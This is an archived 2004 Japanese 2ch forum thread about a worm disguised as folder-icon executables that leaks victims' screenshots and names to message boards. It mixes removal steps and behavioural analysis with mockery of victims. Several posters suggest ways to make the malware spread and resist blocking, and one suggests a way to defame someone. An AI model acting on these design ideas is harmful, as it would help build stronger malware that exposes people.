23:18:52 ID:ExLnvAck] ここ見てるやつ晒されてるな 547 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:20:22 ID:FFBqPrVy] 現時点でもだれかが訴えれば捕まるか 548 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:20:51 ID:EQvNm7YP] >>538 exeだがフォルダアイコンにされてるんで 平気で開く奴はいるだろう 549 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:21:03 ID:iDhsW6nH] こいつ自身にny上での拡散機能は備わってるわけ？ ぬるぽーすは確か繁殖はしなかったからあまり流行らなかったんだよな 550 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:21:15 ID:F8v+LexZ] 三三三三三三三　 （　　　 　|　　 三三三三三　　　　　)）　　　 | 三三三三)ミ,（（＾＾彡ミ彡　 ／　　貴様ッ！ 三三三三 （（三三　　6)彡/／＼ 三三三∩三ﾐl三三　 /ミ彡 ／) |　見ているなッ！ 三三三|彡ミ三ｌ三　／　＼ / /､ | 三三三ヽ＿）二 |￣　ﾉ　／　ﾐl :ｌ､＼ 三　／二 /ミ　‐ｖ-― 4/　）ﾐ/ / /ヽ￣￣￣￣ 三/　￣ /ﾐ　　　ｌﾐ 　 （_/ 三｀4｀4｀4 551 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:22:16 ID:baZulnI6] 最初にupロダにウイルスあげた奴がnyとかのウイルス作者にも繋がってると思うよ 感染した人の誰か被害届け出したら？ 552 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:22:24 ID:iDhsW6nH] んで 作者捕まえられるってのはどうしてだい（・∀・）？ 553 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:23:43 ID:cHFtlyXw] 今頃苺のログが教徒不敬に渡っている模様 554 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:24:31 ID:VPSOXf5B] >538 例えばろり画像うｐったとか言ってリンク貼れば 躊躇も無くフォルダアイコンクリックする奴続出でかなりの被害が出る アンチウィルスは対応してないから zipをスキャンかけた所で何もでなけりゃ普通にクリックしちゃうんだろうな そもそもｎｙやってなければアイコン偽装なんて考え付かないだろう キンタマでた当時もアイコン偽装やら　　　　　　　　　　　　　　　.ｅｘｅやらで感染者多数だったし 555 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:24:45 ID:6gk9JVQ6] スクリーンショットをとるタイミングはランダムなの？ 556 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:25:20 ID:zasm0Yrz] 見たところ、掲示板へのメッセージポストには、 厨房板もリストに入っているんだよな。 557 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:25:36 ID:6gk9JVQ6] >>554 なるほどね。 558 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:27:49 ID:iDhsW6nH] maichy.s1.x-beat.com/up/data/oo5587.jpg ヾ( ﾟ∀ﾟ)ﾉ゛ｳﾋｮｰ 漏れの書き込み写ってるよー おまい感染してるぞm9（・∀・）ﾋﾞｼｯ!! お気に入りさらされて恥ずかしいやつめ(　´∀｀)σ)∀`) 559 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:28:06 ID:mrLzYwy8] 問題はろだが負荷に耐えられない点だ。 nyはそれこそP2Pだから余裕で負荷分散できてたけど、今回のは2chあぷろだに完全依存してるのかな？ 560 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:29:25 ID:mrLzYwy8] やべーﾜｸﾜｸして眠れないよ 昨日2時間しか寝てないってのに…… 561 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:30:21 ID:cHFtlyXw] >>559 バイナリ見たら依存してるっぽい。 作者はそんなに流行らない事を想定して作ったんだろう。 にしても言語がDelphiって、村長..あｑｗせｄｒｆｔｇｙふじこｌｐ 562 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:31:49 ID:l6yZ90q2] ＞463 ：[名無し]さん(bin+cue).rar [sage] ：04/09/22 20:00:51 ID:6gk9JVQ6 ＞そろそろ面白いことになるから覚悟しとけよおまいら お前が面白いことになるかもしれないから覚悟しとけよ。 563 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:32:34 ID:aJET+JT9] >>558 俺の書き込みも入ってる　で 　　　　誰かバスターとか先生に検体出した？　 564 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:32:34 ID:GLBs3gje] まさか村chなんて事はありｓかｈｂしあいううぇうｈじお 565 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:33:22 ID:F2ovsLb+] 小島さん見てる？ 566 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:33:30 ID:kAgi+UO1] 342 名前：分析師はいずこにｗ(ついでに・・・)[sage] 投稿日：04/09/22(水) 22:50:54 ラウンジの偉大な鑑定師様に感謝 etc3.2ch.net/test/read.cgi/entrance/1093784324/529 etc3.2ch.net/test/read.cgi/entrance/1095705642/738 通称：苺きんたま 形態：(写真集) (ロリータ)〜みたいなフォルダ（実際にはフォルダのアイコンのexe） 症状：exeを実行するとデスクトップの画像をキャップし 　　　　２ちゃんのスレに自動的に書き込む 　　　　その他の症状は不明 修復方法：HKEY_CURRENT_USER Software\Microsoft\Windows\CurrentVersion\Run 　　　　　　　のshellsystem.exeを削除 HijackThisの04にも現れると思われるが現時点では不明 O4 - HKLM\..\Run: [？？？] C:\WINDOWS\SYSTEM\shellsystem.exe O4 - HKLM\..\Run: [？？？] C:\WINDOWS\shellsystem.exe 注意：WindowsフォルダはOSなどでは改変する 　　　　？？？は現時点では不明 【分析】HijackThis【研究】 pc5.2ch.net/test/read.cgi/sec/1091346741/ 567 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:34:07 ID:cHFtlyXw] まさか村長、Shareにウィルス流されてからってうわなにをするやめｒｑｗせｄｒｆｔｇｙふじこｌｐ；＠ 568 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:36:12 ID:mrLzYwy8] ということで、ろだ分散が次回作への課題ですな＞作者or改良者 自分で新しいろだを見つけてくるようにできれば最高だけど。 あと感染者が多いと投稿するスレが一瞬で埋まるな。投稿先の分散も(ry あとは節穴と書き込みログうpすれば最凶 人生終わる香具師が続出の悪寒 569 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:36:34 ID:oAAlAMOi] Shareやってないから、村chとか村長とか言われてもわかんないよ〜。 570 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:37:27 ID:6gk9JVQ6] >>562 558はおまえのスクリーンだよって言ってるのかと思ってめっさあせったｗ なんかほんとに面白いことになってきたね。 今夜はねれねぇや！！ 571 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:37:56 ID:cHFtlyXw] んじゃ新ウィルス名は End of life でよろ 572 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:38:27 ID:ikOHa1pk] 別に捕まえなくても個人がそいつ訴えればいい 作者の身元判明したらもしかしたら色んな奴から訴えられるかもしれない。 感染した奴の中に「凄い恨み」を持っている奴も多数いるかもしれない どんどんやればやるほど被害者が増えるわけで本気になるんじゃないかな 573 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:39:38 ID:0Y8OIFWt] >>463って犯人か？ 574 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:40:01 ID:cHFtlyXw] まぁどっちにしろ、kakikomi.txtを出力しない設定にしてる俺は神って事で 575 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:40:10 ID:1LUqJ/M+] フォルダのアイコン変えて無いやつっているのかな 576 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:40:14 ID:mrLzYwy8] しかしこれ最強の2getウイルスだなw 殆どのダミースレで2getしてやがる 577 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:40:47 ID:L3WMITSN] ロダに画像うｐは斬新だけど他は既存と大差ないよなぁ。 感染方法も既存ﾊﾟﾀｰﾝだから大騒ぎするほどじゃないだろ・・・。 578 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:41:32 ID:z98GE62u] 捜査資料作成中のキャプ来ないかなあｗ 579 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:42:16 ID:iDhsW6nH] >>577 面白いからいいんだよ しかし俺もkakikomi.txt趣味で出力してるけど もう止めようかなぁｗ 580 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:42:28 ID:mrLzYwy8] >>577 問題はP2Pという閉じた環境から外に出てきてしまった事だ。 これまではnyネットワーク内で済んでたがこれからは…… 581 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:42:34 ID:6gk9JVQ6] >>573 たまたま。ちょっと煽ってみたら実現しました 582 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:43:01 ID:cHFtlyXw] ロダに画像うｐって別に斬新じゃないと思うが・・・ 583 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:44:08 ID:MmcFLfnI] SP2スレでも書いたけど、セキュリティの最大の欠陥はユーザなんだよな。 Winが穴だらけなのは確かだが、それ以上に・・・ 584 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:45:03 ID:cHFtlyXw] qb5.2ch.net/test/read.cgi/operate/1095695740/85 なんでやたら台湾からShareしてる奴が多いんだよ 585 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:45:25 ID:6gk9JVQ6] 本スレではもう飽きがきてるみたいだな。 586 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:46:37 ID:1LUqJ/M+] スクショ取るだけじゃ決定的な瞬間は撮りづらいなあ デスクトップうｐきぼんぬ 587 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:48:08 ID:cHFtlyXw] システム稼動に必要以外のプロセスkillして、その瞬間にスクショとかあｑｗせｄｒｆｔｇｙふじこｌｐ；＠ 588 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:48:19 ID:mrLzYwy8] 画像見れないから飽きが来るんだろうな。 アプロダ落ちたらそれまで。 589 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:50:58 ID:Pp/pgXRx] キムタマはデスクトップ上のフォルダも一緒に流したじゃん？ ('A`) ﾋﾞﾐｮｰ 590 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:52:28 ID:zasm0Yrz] Monazilla/1.00 (toolname/ver)Maropa2ch 停止しました 私は苺で違法ダウンロードばかりしている犯罪者です shellsystem.exe　open %d回目 大人の時間 半角二次元 アップローダ 雑談系２ 厨房！ ってあたりかな。 厨房のスレッドにもやるつもりだったけどやめたのかな？ あるいは、半角板にアップローダってのが含まれるスレッドが無くなったら 厨房板の一番上のスレッドにpostするのか。 591 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:52:43 ID:1LUqJ/M+] 本スレってどこ？ 592 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:52:47 ID:mrLzYwy8] あとアイドル的存在がいないって言うのもあるな naoはまさに神だった…… 593 名前：[名無し]さん(bin+cue).rar [04/09/22 23:52:56 ID:6gk9JVQ6] これさぁ。ユーザー名をムカつく奴のフルネームにして。 わざと感染しエロゲー画像を流しまくったら・・・・・こ、こわ！！ 594 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:53:41 ID:6gk9JVQ6] ごめんあげてもた 595 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:54:07 ID:iDhsW6nH] うｐろだを可能な限りウイルスに書いといて 実行時にはランダムに選ぶようにすればおｋか？ それで軽くなればjpg以外の小さなものもうｐできるようになるな 596 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:56:55 ID:Ig4m3Rvj] 晒されたのを見て楽しむ側にお手軽感がないな キンタマとキーワード設定するだけで寝てる間にたまるnyとは違うね 597 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:58:26 ID:mrLzYwy8] 節穴があれば画像が見れなくても多少は楽しめたんだがなー 598 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 23:59:31 ID:Nw+F3dT8] 鯖側に対策されたらすぐ終わりじゃん P2Pの利点を全く活かしてないな 599 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:02:23 ID:IFT2b9V5] 名前リネームするつもり駄思わずダブルクリックしちまった(笑) >shellsystem.exe(笑) 600 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:02:49 ID:cDvdfQLH] （笑？(汗 601 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:03:43 ID:avdWvEQz] >>599 そのまま飼えｗ 602 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:03:45 ID:mmGHQUsE] 俺は正直このくらいでいい。 観てるほうは面白いし晒された方はちょっと恥ずかしいけど そんなにダメージでかくない。あとは画像が見れれば最強なんだが。 603 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:05:06 ID:qxy2PN5p] www.zakzak.co.jp/top/ 2004_09/t2004090121.html このアドレスだけ書き込めないんだけどなぜ？ （改行してあります） 604 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:05:12 ID:uOSTlOvj] 344 名前：分析師はいずこにｗ(ついでに・・・)[sage] 投稿日：04/09/23(木) 00:01:32 苺きんたまに感染してみたぞーーーｗ 俺が実行したのは「(写真集) (ロリータ) 水原友里.exe」だｗｗｗ ノートン先生とBitDefenderおよびFWは全てスルーされたｗ もちろんスパイウェア駆除製品も・・・おっとスルーだｗ ちなみネット切断した状態で実験したから俺の画像は多分ないぞｗｗｗ 感染するとプロセスが2つ走りどちらか一つを消しても 片方を復活させる仕組みでプロセスから終了は不可 感染するとPCのデスクトップのスクリーンが取られ晒され 【うｐろだ】アップローダー案内所【アプロダ】板に以下の書き込みがされる 名前：私は苺で違法ダウンロードばかりしている犯罪者です[ここに晒るされた時の初回のID:1回目] 私は苺で違法ダウンロードばかりしている犯罪者です 【コンピュータ名】コンピュータ名が入る 【ユーザー名】ユザー名が入る(例：Owner) 【今こんな事やってます】２ちゃんロダのアドレスが晒され先が貼られる 取った処置 １：まずPCの電源を切りセーフモードで起動してファイルのC:\WINDOWS\shellsystem.exeを削除 ２：元になった「(写真集) (ロリータ) 水原友里.exe」も一応削除 ３：普通に再起動してHijackThisでScan以下のエントリーをFixで削除 O4 - HKLM\..\Run: [shellsystem.exe] C:\WINDOWS\shellsystem.exe ３：のHijackThisの処理で以下が消えてるのも確認できた HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run name：shellsystem.exe　data：shellsystem.exe 若干の祭り状態だからこれからの患者が予想されるｗ とりあえずこれで解決めでたしめでたしｗｗｗ 605 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:06:10 ID:ERKjq774] 勇者乙！ 606 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:06:38 ID:cDvdfQLH] たかがこんなウィルスでマルチプロセスにするとは。 なんか村長の気がしないでもない。 607 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:08:12 ID:cDvdfQLH] つーかFWがスルーしたってのはただ単に設定ミス・・ 608 名前：[名無し]さん(bin+cue).rar [04/09/23 00:09:20 ID:twtSBewN] ユーザー名の変更 www.windowsfan.com/xp/tips/contents/setting/set_user03.htm コンピュータ名の変更 www.windowsfan.com/xp/tips/contents/lan/lan_name01.htm 本名を吊るされないために 609 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:09:28 ID:mgVunU57] >>599 デスクトップをグロ画像に汁 >>604 > 感染するとプロセスが2つ走りどちらか一つを消しても > 片方を復活させる仕組みでプロセスから終了は不可 うをすげー。 珍しくもないのかも知れないけど、この発想はいいな。 610 名前：[名無し]さん(bin+cue).rar [04/09/23 00:09:58 ID:mmGHQUsE] >>604 作者は力入れるとこ間違ってる気がする。 611 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:11:38 ID:avdWvEQz] >>609 レジストリも頻繁に書き直してれば結構やばいな 612 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:13:41 ID:JkmDFIbz] >>611 レジストリも書き直ししてるよ　猛烈な速さで 613 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:15:03 ID:62NRg8JO] 苺キンタマか　 614 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:15:39 ID:IFT2b9V5] マルチプロセスだね(笑) 一個殺しただけじゃ排除できない。 基本的には １）%system%\shellsystem.exeを作成する(自己複製) ２）HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 　　にshellsystem.exeを追加 ３）うｐろだのクッキーを取得し、PrintScreenしてup用のデータを作る ４）レジストリからマシン名とユーザ名を取得 ５）掲示板用のデータ作成 ６）指定キーワードでマッチした掲示板上のスレッドにpost って感じみたいね。感染してみたところ(笑) 615 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:16:48 ID:q17x7W8p] すげぇな… ちょっと感心してしまった 616 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:18:30 ID:cDvdfQLH] 村長… 617 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:20:28 ID:IFT2b9V5] >>590 ちなみに、これが２ちゃんの掲示板上へpostするときの条件。 618 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:20:43 ID:+TwoeBBt] 気合入った作りだな ただウィルスとしては何か間違ってる気がする 619 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:24:10 ID:yEjCkAsP] 祭り会場どこ？ 参加したい 620 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:24:48 ID:iavrH4rm] XP限定？ 621 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:26:02 ID:IFT2b9V5] 98では試してないけど、2000でも感染する。 内部的には特にOSに依存しているように見えないよ。 622 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:26:21 ID:62NRg8JO] >>619 ここらしいよ　【うｐろだ】アップローダー案内所13【きんたま】 　　　　　　　　　　　　　idol.bbspink.com/test/read.cgi/ascii2d/1095857518/ 　　　　 　　　　苺キンタ祭 623 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:26:43 ID:Omvkoikg] >>619 idol.bbspink.com/test/read.cgi/ascii2d/1095857518/ 624 名前：[名無し]さん(bin+cue).rar [04/09/23 00:26:52 ID:8EfG+J1e] jpgもﾔｳﾞｧｲらしいぞ!!!! 625 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:27:05 ID:IFT2b9V5] でも、プロセス殺せないって言い過ぎだね、祭りスレ。 プロセスツリーを殺せば両方死ぬよ。 626 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:28:03 ID:yEjCkAsP] >>622,623 thx 627 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:29:09 ID:Q+leSqll] >>563 ノートン先生には出しておいた。 628 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:29:14 ID:neSmPO5T] 晒されたjpg見てたら、ﾒｰﾗが勝手に起動したぞ、ｵｲ 629 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:29:36 ID:mmGHQUsE] おいおまいら関祭りには参加しなかったのか？ 630 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:31:11 ID:zW53Q5jb] >>629 してるよ。チャットだろ 631 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:32:10 ID:XTKk22G2] >>630 お前可愛いな 632 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:33:53 ID:WmXl7kiF] 原口祭りの次は関祭りか 633 名前：[名無し]さん(bin+cue).rar [04/09/23 00:35:56 ID:IE8I1c5s] 原口とか関って誰？ 634 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:35:59 ID:mmGHQUsE] tesu 635 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:39:25 ID:sH8yfJe2] セーフモードで起動しなくても駆除できるよ。 使うものはコマンドプロンプトとレジストリエディタ。 1. 感染したらまず、コマンドプロンプトを開いてtasklistを実行 2. その中に以下のいずれかのファイル名があることを確認 (写真集) (ロリータ) 水原友里.exe (写真集) (ロリータ) 相田香奈子.exe コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe shellsystem.exe 3. あるのを確認したら下記のコマンドを入力 　taskkill /f /im "ウイルスのファイル名" /t 4. 「成功」と出たら次は下記ウイルスファイルの削除を行う 　%SystemRoot%\shellsystem.exe 　解凍先にあるウイルスファイル 5. 削除が完了したらレジストリエディタ（regedit）を開いて HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run shellsystem.exe :='C:\Windows\shellsystem.exe' HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run shellsystem.exe :='C:\Windows\shellsystem.exe' を削除する 以上で完了かな。 636 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:39:27 ID:EpVCAi7y] 感染能力ないんだろ？ 637 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:39:46 ID:mmGHQUsE] てす 638 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:41:09 ID:62NRg8JO] >>627 ID変わってるけど�dくす 　　　　SS見たいのは山々だけど、ろだが重くて見れんよ(´･ω･`)ｼｮﾎﾞｰﾝ 　　　　というかつい最近あった脆弱性を突いて、晒されたjpgを見ただけで感染したら 　　　　恐ろしいかも　もともと感染しちゃった人は偽装exeを知らなかったんだね… 639 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:42:44 ID:mmGHQUsE] ニュー速で規制されたorz ９０秒ってなげーよ・・・ 640 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:43:48 ID:Xufqlvin] えーと、nyはPCに入れてないんですが、感染してしまいました。 上で書かれた方法で徹底的に除去しましたが、再インストールの必要性はありますか？ 641 名前：感染でパニクってる者達へ mailto:sage [04/09/23 00:44:13 ID:ERKjq774] 以上 tmp4.2ch.net/test/read.cgi/download/1094872215/ の >>635 さんの書き込みです 成功したら彼に感謝を 642 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:44:36 ID:avdWvEQz] >>640 人生を再インストー（ｒｙ 643 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:45:00 ID:Rr2p3mqe] キンタマのやつ、システムの復元やったらウィンドゥズのトコにあったファイル消えたけど これで大丈夫？ 644 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:45:19 ID:IFT2b9V5] vbsあたりで除去パッチ簡単に作れそうだね。 645 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:46:08 ID:Xufqlvin] >>642 なるほど、いっそこの際元から断つ(絶つ)、と。 人生のアドバイスありがとうございます。 646 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:46:11 ID:IE8I1c5s] >>643 ドゥイジョウブドゥス 647 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:46:36 ID:R1XdgUSO] こどもホタル祭りﾜﾛﾀ 648 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:47:05 ID:Rr2p3mqe] >>646 サンクス 649 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:49:23 ID:4MBKm6hw] USBｶﾒﾗでｽｸﾘｰﾝｼｮｯﾄ機能はどうした? 650 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:49:45 ID:o5J4yEHm] >647 なにそれ？ 651 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:53:55 ID:ZTCe7RBf] >>635 tasklistってXPhomeだとなに？ 652 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:55:00 ID:Q9B0LMRA] 2ch側がUserAgentではじくようにするのが手っ取り早い? 653 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:57:19 ID:R1XdgUSO] >>650 【うｐろだ】アップローダー案内所13【きんたま】 idol.bbspink.com/test/read.cgi/ascii2d/1095857518/617 654 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:58:51 ID:o5J4yEHm] >653 わかった。どうも。 655 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 00:59:22 ID:cDvdfQLH] にしてもDelphiやらPerlやら、糞言語ばかりで作るな・・・ｳｨﾙｽ 656 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:05:43 ID:sH8yfJe2] >>635はXP Pro前提で書いてます。 Homeやその他のOSは>>604あたりで。 657 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:06:19 ID:avdWvEQz] >>656 やっぱりpro限定だったか 658 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:06:22 ID:+1rdgFwz] 感染するやつは馬鹿 659 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:07:11 ID:IFT2b9V5] >>652 monadzillaのブラウザの何かに偽装してるんじゃないかと思うよ。 660 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:08:11 ID:cDvdfQLH] 苺キンタマのUSER_AGENTはmonazilla.orgの資料室そのままでしたが。 661 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:08:22 ID:IFT2b9V5] taskkillあたりは、買ったOSのsupportディレクトリにあるsupporttoolsにあるんじゃないかと。 662 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:10:41 ID:mmGHQUsE] しかし久々にflashget使ったよｗ 663 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:13:14 ID:dsk7MRPS] 一番簡単な削除方法は>>643って事？ 664 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:13:41 ID:IE8I1c5s] 俺も久々にIrvine使ったｗ 665 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:15:05 ID:Q9B0LMRA] Monazilla/1.00 (toolname/ver)Maropa2chをはじけば 666 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:27:08 ID:Zv59j045] しかしキンタマ関係のVirus作る奴はいつも笑わしてくれる 667 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:35:02 ID:ntwmMQhY] 俺フォルダアイコンデフォのままなんだがこんなの踏む奴いるのか？ 668 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:35:42 ID:mmGHQUsE] もううｐはやんだの？ 669 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:36:08 ID:yEjCkAsP] .folderどころか.exeを踏む奴がイパーイ >>667 一応変えといたら？ 670 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:37:41 ID:avdWvEQz] ってなに、shareの方でもクリップボード晒しｳｨﾙｽが出てたんだな share初のｳｨﾙｽとは聞いていたが、ｸﾘﾎﾞ晒しとは、なかなかやるじゃないかshare 671 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:39:33 ID:62NRg8JO] >>667 ロリ画像の欲望に負けたら踏むさ >>668 祭り会場にいってみなされ 俺も今更ながら変えたよ　圧縮ファイルにはdelexeとSSMは手放せない　 672 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:41:38 ID:cDvdfQLH] ってかXPユーザは気付けよ、アイコンが古い事と小さくしたらそのまんま小さくなる点に。 673 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 01:43:20 ID:ntwmMQhY] >>672 同意。 アイコンが全然違う。 674 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:32:28 ID:E03v0hA1] ｵﾜﾀ 675 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:34:21 ID:mva2OVxj] Share(仮称)__part66 tmp4.2ch.net/test/read.cgi/download/1095530285/644 644 名前：人柱 ◆k2VpQ2TTb. ：04/09/23 02:03:52 ID:9E7gEobQ 実は秘密のプログラムには秘密のバックドアが仕掛けてあったって知ってた？ 京都府警のところにいってるよん。 676 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:40:20 ID:oBodvraO] まず作者は ・うｐ炉だを多数の中からランダムに ・ｷｬﾌﾟﾁｬ以外もうｐ。できればkakikomi.txt ・繁殖機能 これよろしく 677 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:41:48 ID:yDWoB56M] Rock54対策も重要だな 678 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:47:20 ID:biKrCHPF] 2chのそれっぽいスレでURL検索 対応うｐろだCGI検出 特殊なファイル名でうｐ うｐファイル名を調べて同種ウィルスによるうｐ数が一定以上ならば 新たなうpろだ探し 複数のうｐろだCGIに対応しておけばそれなりに 強固だと思ふ 679 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:47:44 ID:mmGHQUsE] あ〜面白かった。三日分は笑ったな。 680 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:51:47 ID:XmzjVHkd] exe ファイル　捨てたい 681 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:52:48 ID:oBodvraO] 自身をうｐろだに名前変えまくってうｐしまくり はやめてね 困るから 682 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 02:59:52 ID:EETLBaqB] 苺キンタマに感染したかどうかは どうやってわかるの？教えてエロい人 683 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:00:29 ID:LvJ+JBBu] 苺ウィルスワラタｗ なんだこりゃ 684 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:05:04 ID:LvJ+JBBu] それにしてもよくもいろいろと考えつくものだ 685 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 03:05:08 ID:IFT2b9V5] 